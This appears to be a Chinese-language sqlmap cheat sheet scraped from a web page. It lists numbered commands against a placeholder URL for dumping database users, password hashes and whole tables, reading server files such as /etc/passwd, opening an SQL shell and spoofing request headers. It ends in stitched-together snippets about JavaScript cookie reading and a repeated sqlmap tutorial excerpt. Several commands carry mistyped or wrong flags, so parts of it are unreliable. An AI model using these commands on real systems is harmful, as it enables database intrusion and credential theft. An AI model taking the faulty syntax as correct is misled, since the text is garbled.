1)判斷當前使用者是否是dba
python sqlmap.py -u "url" --is-dba -v 1
2)--users:列出資料庫管理系統使用者
python sqlmap.py -u "url" --users -v 0
3)--passwords:資料庫使用者密碼(hash)
python sqlmap.py -u "url" --passwords -v 0
python sqlmap.py -u "url" --passwords -u sa -v 0
4)檢視使用者許可權
python sqlmap.py -u "url" --privileges -v 0
python sqlmap.py -u "url" --privileges -u postgres -v 0
5)--dbs可以利用的資料庫
python sqlmap.py -u "url" --dbs -v 0
6)--tables列資料庫表
python sqlmap.py -u "url" --tables -d "information_scheam"
-d:指定資料名稱
7)--columns 列出表中的列名
python sqlmap.py -u "url" --columns -t "user" -d "mysql" -v 1
-t:指定表名,-d:指定庫名
8)--dump列表中指定列的內容
python sqlmap.py -u "url" --dump -t "users" -d "testdb"
-c:可以指定字段
指定列的範圍為2到4
python sqlmap.py -u "url" --dump -t "users" -d "testdb" --start 2 --stop 4 -v 0
9)--dumap-all列出所有資料庫,所有表內容
python sqlmap.py -u "url" --dump-all -v 0
只列出使用者自己新建的資料庫和表的內容
python sqlmap.py -u "url" --dump-all --exclude-sysdbs -v 0
10)--file讀取檔案內容[load_file()函式]
python sqlmap.py -u "url" --file /etc/password
11)執行sql
python sqlmap.py -u "url" --sql-shell
12)-p 指定引數
python sqlmap.py -u "url" -v 1 -p "id"
-p可以指定多引數-p "cat,id"
13)post提交
python sqlmap.py -u "url" --method post --data "id=1"
14)cookie提交
python sqlmap.py -u "url" --cookie "id=1" -v 1
cookie值可以由tamperdata抓取
15)refer欺騙
python sqlmap.py -u "url" --refer "url" -v 3
16)使用自定義user-agent或者user-agents.txt
python sqlmap.py -u "url" --user-agent "mozilla/4.0 (compatible; msie 7.0; windows nt 5.1)" -v 3
python sqlmap.py -u "url" -v 1 -a "./txt/user-agents.txt"
17)使用多執行緒猜解
python sqlmap.py -u "url" -v 1 --current-user --threads 3
18)指定資料庫,繞過sqlmap的自動檢測
python sqlmap.py -u "url" -v 2 --dbms "postgresql"
19)指定作業系統繞過sqlmap自動檢測
python sqlmap.py -u "url" -v 2 --os "windows"
20)--prefix and --postfix自定義payload
python sqlmap.py -u "url" -v 3 -p "id" --prefix "'" --postfix "and 'test'='test"
21)union注入測試
python sqlmap.py -u "url" --union-test -v -1
22)配合order by
python sqlmap.py -u "url" --union-test --union-tech orderby -v 1
23)python sqlmap.py -u "url" -v 1 --union-use --banner
24)python sqlmap.py -u "url" -v 5 --union-use --current-user
25)python sqlmap.py -u "url" -v 1 --union-use --dbs
js常用獲取指定cookies方法
一般關於js讀取cookie方法有很多,下面的例項函式主要是利用split函式來分切,和document.cookie獲取所有cookie再利用for遍歷所有陣列,判斷如果cookie名相同,那麼這個cookie 就是我們要找的。方法一 如下 var acookie document.cookie....
sqlmap學習(八)指定位置注入
p 指定引數進行掃瞄,不是掃瞄所有引數,這樣可以避免浪費時間到非注入點引數上,從而提高掃瞄效率。python sqlmap.py u url p id,user agent skip跳過指定引數掃瞄,和 p作用相反,它用來跳過需要掃瞄的引數。python sqlmap.py u url skip i...
sqlmap學習(八)指定位置注入
p 指定引數進行掃瞄,不是掃瞄所有引數,這樣可以避免浪費時間到非注入點引數上,從而提高掃瞄效率。python sqlmap.py u url p id,user agent skip跳過指定引數掃瞄,和 p作用相反,它用來跳過需要掃瞄的引數。python sqlmap.py u url skip i...